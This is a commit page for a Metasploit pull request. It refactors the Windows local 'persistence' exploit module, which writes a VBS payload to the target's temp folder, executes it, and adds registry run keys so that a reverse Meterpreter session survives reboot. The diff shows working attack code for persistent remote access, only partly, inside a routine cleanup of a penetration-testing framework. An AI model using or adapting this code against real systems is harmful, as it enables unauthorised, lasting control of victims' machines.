Merge pull request #2 from jvazquez-r7/persistence_vbs

using Post::File methods plus little more cleanup
agix · Feb 12, 2013 · 091322f · 091322f
2 parents 7485e42 + 42a6d96
commit 091322f
Showing 1 changed file with 4 additions and 24 deletions.
diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb
@@ -26,11 +26,10 @@ def initialize(info={})
 		super( update_info( info,
 			'Name'          => 'Windows Manage Persistent Payload Installer',
 			'Description'   => %q{
-				This Module will create a boot persistent reverse Meterpreter session by
+					This Module will create a boot persistent reverse Meterpreter session by
 				installing on the target host the payload as a script that will be executed
 				at user logon or system startup depending on privilege and selected startup
 				method.
-
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        =>
@@ -54,8 +53,7 @@ def initialize(info={})
 
 	end
 
-	# Exploit Method for when run command is issued
-	#-------------------------------------------------------------------------------
+	# Exploit Method for when exploit command is issued
 	def exploit
 		print_status("Running module against #{sysinfo['Computer']}")
 
@@ -114,20 +112,7 @@ def exploit
 		)
 	end
 
-	# Creates persistent script
-	#-------------------------------------------------------------------------------
-	def create_script(delay, altexe)
-		if not altexe.nil?
-			vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay, :template => altexe})
-		else
-			vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay})
-		end
-		print_status("Persistent agent script is #{vbs.length} bytes long")
-		return vbs
-	end
-
 	# Function for creating log folder and returning log path
-	#-------------------------------------------------------------------------------
 	def log_file(log_path = nil)
 		#Get hostname
 		host = session.sys.config.sysinfo["Computer"]
@@ -151,18 +136,15 @@ def log_file(log_path = nil)
 	end
 
 	# Writes script to target host
-	#-------------------------------------------------------------------------------
 	def write_script_to_target(vbs,name)
-		tempdir = session.fs.file.expand_path("%TEMP%")
+		tempdir = expand_path("%TEMP%")
 		if name == nil
 			tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
 		else
 			tempvbs = tempdir + "\\" + name + ".vbs"
 		end
 		begin
-			fd = session.fs.file.new(tempvbs, "wb")
-			fd.write(vbs)
-			fd.close
+			write_file(tempvbs, vbs)
 			print_good("Persistent Script written to #{tempvbs}")
 			@clean_up_rc << "rm #{tempvbs}\n"
 		rescue
@@ -174,7 +156,6 @@ def write_script_to_target(vbs,name)
 	end
 
 	# Executes script on target and return the PID of the process
-	#-------------------------------------------------------------------------------
 	def target_exec(script_on_target)
 		execsuccess = true
 		print_status("Executing script #{script_on_target}")
@@ -193,7 +174,6 @@ def target_exec(script_on_target)
 	end
 
 	# Installs payload in to the registry HKLM or HKCU
-	#-------------------------------------------------------------------------------
 	def write_to_reg(key,script_on_target, registry_value)
 		# Lets start to assume we had success.
 		write_success = true